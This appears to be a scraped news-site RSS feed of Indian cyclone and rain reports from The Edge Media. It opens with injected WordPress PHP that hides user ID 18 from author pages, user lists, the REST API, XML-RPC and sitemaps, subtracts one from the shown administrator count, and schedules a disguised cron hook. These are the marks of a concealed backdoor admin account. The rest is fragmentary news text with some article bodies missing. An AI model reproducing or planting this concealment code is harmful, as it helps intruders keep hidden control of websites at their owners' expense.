add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Cyclone Expected to Hit Andhra Coast Near Kakinada on October 28 Night appeared first on The Edge Media.
]]>
On Saturday (October 25), the IMD reported that the depression over the southeast Bay of Bengal had moved westward and is likely to intensify first into a deep depression by Sunday (October 26) and later into a cyclonic storm by Monday morning (October 27), over the southwest and adjoining west-central Bay of Bengal.
To assess preparedness, Cabinet Secretary T. V. Somanathan convened a meeting of the National Crisis Management Committee (NCMC). Senior officials, including the Chief Secretaries of Tamil Nadu, Andhra Pradesh, and Puducherry, and the Additional Chief Secretary of Odisha, briefed the committee on precautionary actions and evacuation measures being taken in coastal regions expected to be affected by the cyclone.
Authorities have urged residents in low-lying and coastal areas to remain alert and follow official advisories as the system continues to intensify.
The post Cyclone Expected to Hit Andhra Coast Near Kakinada on October 28 Night appeared first on The Edge Media.
]]>The post Low pressure likely to form on June 11 over Bay of Bengal appeared first on The Edge Media.
]]>Under the influence of the low pressure, most of East India and adjoining central India will likely witness fairly widespread rainfall activity from June 10 onwards.
The weather department further added that due to the strengthening of southwesterly winds from Bay of Bengal to Northeast and adjoining East India, a cyclonic circulation will be formed over central Assam and neighbourhood, including West Bengal and South Chhattisgarh.
These areas will likely witness widespread rainfall activity over the next four-five days.If the low pressure converts into cyclone, India would witness third cyclone — after Tauktae and Yaas — within weeks.
Cyclone Tauktae was formed on May 14 and dissipated on May 19. Tauktae was formed in Arabian Sea. Just a week later, Cyclone Yaas hit the eastern coast of the country. It was formed on May 23 and dissipated on May 28.
In its latest update on Monday, the department said that a low pressure area was likely to form over North Bay of Bengal around 11th June. Southwesterly winds over Arabian Sea was also likely to strengthen from 10 June.
Monsoon is likely to advance into remaining parts of Maharashtra (including Mumbai), Telangana and Andhra Pradesh by 11 June; Odisha, West Bengal, Chhattisgarh, Jharkhand, Bihar, East Uttar Pradesh, some parts of Madhya Pradesh, and Gujarat state during 11-13 June,” it said in a statement issued on June 7.
The post Low pressure likely to form on June 11 over Bay of Bengal appeared first on The Edge Media.
]]>The post Cyclone Yaas: PM Modi meets Odisha CM, aerial survey to be conducted soon appeared first on The Edge Media.
]]>After the meeting, the Prime Minister authorised an aerial survey of the affected areas of Bhadrak and Balasore districts.
A meeting is soon to be held in East Medinipur, where West Bengal Governor Jagdeep Dhankar and West Bengal Chief Minister Mamata Banerjee will be joining PM Modi.
The meeting is due to be held at Kalaikunda in Paschim Medinipur district on 28 May after the PM undertakes an aerial survey of the affected areas. Dhankhar will receive the Prime Minister at the Kalaikunda Air Force Station, according to officials.
The post Cyclone Yaas: PM Modi meets Odisha CM, aerial survey to be conducted soon appeared first on The Edge Media.
]]>The post Cyclone Yaas to hit Orissa and Bengal on 26th Morning warns IMD appeared first on The Edge Media.
]]>

The post Cyclone Yaas to hit Orissa and Bengal on 26th Morning warns IMD appeared first on The Edge Media.
]]>The post The Central government issues guidelines regarding the Cyclone Yaas appeared first on The Edge Media.
]]>The Union Health Secretary, Rajesh Bhushan sent a letter to the chief secretaries of Andhra Pradesh, Tamil Nadu, Odisha and West Bengal. they are advised to follow the release f the India Meteorological Department (IMD) and plan accordingly. The order also stated that the health ministry is ready to provide all the support necessary for the same.
The guideline issued by the health ministry are:
The post The Central government issues guidelines regarding the Cyclone Yaas appeared first on The Edge Media.
]]>The post ‘Orange’ alert issued in Delhi for heavy rain appeared first on The Edge Media.
]]>The IMD has also predicted water eruption in various areas which will cause major traffic disruption. Delhi and the neighbouring areas have received a moderate rainfall today. According to the weather office, the rainfall is most likely to decrease on Thursday.
The highest temperature in the moved to a bit more than 30 degrees celsius because of the wind and the rainfall. This is the lowest temperature recorded in the month of May since the last four years.
heavy to very heavy rainfall at isolated places over northwest Uttar Pradesh; and heavy rainfall at isolated places over Himachal Pradesh Haryana, Chandigarh & Delhi, rest parts of Uttar Pradesh, northeast Rajasthan and north Madhya Pradesh on 19 May, 2021.
— India Meteorological Department (@Indiametdept) May 19, 2021
The post ‘Orange’ alert issued in Delhi for heavy rain appeared first on The Edge Media.
]]>The post Cyclone Tauktae stops the COVID vaccination drive in Gujarat appeared first on The Edge Media.
]]>In the meantime, Cyclone Tauktae killed atleast seven people in Gujarat. It has left behind an aftermath of destruction along the coast. It uprooted the electric poles and tress and damaged several houses and roads.
The cyclone has now weakened into a “cyclonic storm” and will slowly become just a “deep depression”. The cyclone has caused heavy rainfall in various parts of the states. The rainfall has caused water logging in Ahmedabad.
The post Cyclone Tauktae stops the COVID vaccination drive in Gujarat appeared first on The Edge Media.
]]>The post Videos of large waves crashing on the Gateway of India goes viral. appeared first on The Edge Media.
]]>Several videos of this disastrous cyclone are circulated through various social media platforms showing the ferocity of the same. One of the clips contain a video of the Gateway of India getting hit by the ferocious waves. Some of these videos are shot through the Taj Hotel showing the waves hitting the metal barricades. It also portrays the sound of the winds that are continuously howling at a high speed. The video surely shows the ferocious face of the nature.
Tauk- tae Cyclone disaster at Gateway of India.
.17 may 2021.#Tauktae #tauktaecycloneMumbai pic.twitter.com/cwlHOuPs6L
— Dhawal Shah. (@dhawalkshah) May 18, 2021
A terrifying aerial view of heavy rains and gusts at the Gateway of India due to Cyclone Tauktae.#cyclonetauktae #cyclone #gatewayofindia #pinkvillareels #pinkvilla pic.twitter.com/yWX6K3sphg
— Pinkvilla (@pinkvilla) May 17, 2021
The post Videos of large waves crashing on the Gateway of India goes viral. appeared first on The Edge Media.
]]>The post Cyclone Nivar in Tamil Nadu, evacuated coastal areas appeared first on The Edge Media.
]]>The post Cyclone Nivar in Tamil Nadu, evacuated coastal areas appeared first on The Edge Media.
]]>